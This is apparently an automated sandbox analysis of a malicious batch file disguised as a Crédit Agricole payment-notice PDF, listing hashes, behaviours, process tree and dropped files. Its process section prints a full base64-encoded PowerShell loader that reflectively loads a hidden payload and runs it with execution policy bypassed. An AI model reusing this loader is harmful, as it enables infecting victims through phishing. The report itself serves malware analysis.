463b92101e5f2912781dd6eb61374b97f14fb27b6fe05c0ef3fb734d8ef4d4ec

General

Target

Avviso di Pagamento_Credit Agricole_Pdf.bat
Size

191KB
MD5

2effd68ca29fb310fbe40749eb566d0e
SHA1

bb23473d4be94830371bd52afe37cb1b59609ed5
SHA256

463b92101e5f2912781dd6eb61374b97f14fb27b6fe05c0ef3fb734d8ef4d4ec
SHA512

994de4787401c0e5ce032be67adb93c5e9aa6aa4c510ab19aa1f41a75808b927428e779f2479542465c738eff5138c94fa3cb71da6835957cfb9531f9afa12c6
SSDEEP

3072:4/IpFBvxdugvwReuVhjNCHhGHkTjV/bnHVeLYvElkMp2GMkCTH3djFoll4MPUQTZ:4/APubReSj460jhHkLYvEAP3soMPxoWV

Score

1^/10

Malware Config

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2272 powershell.exe
2432 powershell.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exepowershell.exe

pid process

2272 powershell.exe
2432 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2272 powershell.exe
Token: SeDebugPrivilege 2432 powershell.exe

pid	process
2272	powershell.exe
2432	powershell.exe

pid	process
2272	powershell.exe
2432	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	2432	powershell.exe

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

cmd.execmd.exe

description	pid	process	target process
PID 2192 wrote to memory of 2300	2192	cmd.exe	cmd.exe
PID 2192 wrote to memory of 2300	2192	cmd.exe	cmd.exe
PID 2192 wrote to memory of 2300	2192	cmd.exe	cmd.exe
PID 2300 wrote to memory of 2272	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 2272	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 2272	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 2272	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 2432	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 2432	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 2432	2300	cmd.exe	powershell.exe
PID 2300 wrote to memory of 2432	2300	cmd.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Avviso di Pagamento_Credit Agricole_Pdf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\Avviso di Pagamento_Credit Agricole_Pdf.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:2300

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiY2hyb21lLmJhdCINCiRsYXN0TGluZSA9IEdldC1Db250ZW50IC1QYXRoICRmaWxlUGF0aCB8IFNlbGVjdC1PYmplY3QgLUxhc3QgMQ0KJGNsZWFuZWRMaW5lID0gJGxhc3RMaW5lIC1yZXBsYWNlICdeOjonDQokcmV2ZXJzZSA9IFJldmVyc2VTdHJpbmcgJGNsZWFuZWRMaW5lDQokZGVjb21wcmVzc2VkQnl0ZSA9IERlY29tcHJlc3NCeXRlcyAtY29tcHJlc3NlZERhdGEgJHJldmVyc2UNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCkludm9rZS1FeHByZXNzaW9uICRkZWNvZGVkU3RyaW5nDQoNCkNsb3NlLVByb2Nlc3MgLVByb2Nlc3NOYW1lICJjbWQi')) | Out-File -FilePath 'C:\Users\Admin\chrome.ps1' -Encoding UTF8"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\chrome.ps1"
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
16a5db2cdd7178e01139743e1e77967c

SHA1
47f052fee8558cfcd4dbbf861b7d7594f9fb3867

SHA256
da2793c68a5be31367394e3ef7d70974968bd8bb627579b9de12db94d48c778c

SHA512
ae0398fa4ebac5c7cfb2e2d044d2e77403b6d611e579b5f1f4feba287c452a82ed0441e8a5c9bacc48e457688475f65969dc339caa3e7f94a7c0de3be0408335

Download Submit
C:\Users\Admin\chrome.bat
Filesize
191KB

MD5
2effd68ca29fb310fbe40749eb566d0e

SHA1
bb23473d4be94830371bd52afe37cb1b59609ed5

SHA256
463b92101e5f2912781dd6eb61374b97f14fb27b6fe05c0ef3fb734d8ef4d4ec

SHA512
994de4787401c0e5ce032be67adb93c5e9aa6aa4c510ab19aa1f41a75808b927428e779f2479542465c738eff5138c94fa3cb71da6835957cfb9531f9afa12c6

Download Submit
C:\Users\Admin\chrome.ps1
Filesize
1KB

MD5
1d6288e218ce9fed4e703ef5aa2e6c08

SHA1
39c5fbc0b8931bab67c40dc3f45be696ea3beb90

SHA256
d0832834c002fe7e915e8c78b21642df8ab90dd778e77f8c9dfbf93d9a517ae6

SHA512
c45d64b2aede293f414e1325d711df3314cf9527a62dbb362cf4210b8eeedcb8232feca70bf6a548cc865c9598c02620667b4920a049c9f50d7d7c0eda68507c

Download Submit
memory/2272-4-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2272-5-0x0000000002AF0000-0x0000000002B30000-memory.dmp

Filesize
256KB

Download
memory/2272-6-0x0000000002AF0000-0x0000000002B30000-memory.dmp

Filesize
256KB

Download
memory/2272-7-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2272-9-0x00000000742C0000-0x000000007486B000-memory.dmp

Filesize
5.7MB

Download
memory/2432-17-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/2432-18-0x00000000029F0000-0x0000000002A30000-memory.dmp

Filesize
256KB

Download
memory/2432-16-0x00000000029F0000-0x0000000002A30000-memory.dmp

Filesize
256KB

Download
memory/2432-15-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/2432-21-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/2432-22-0x0000000074280000-0x000000007482B000-memory.dmp

Filesize
5.7MB

Download
memory/2432-23-0x00000000029F0000-0x0000000002A30000-memory.dmp

Filesize
256KB

Download
memory/2432-24-0x00000000029F0000-0x0000000002A30000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads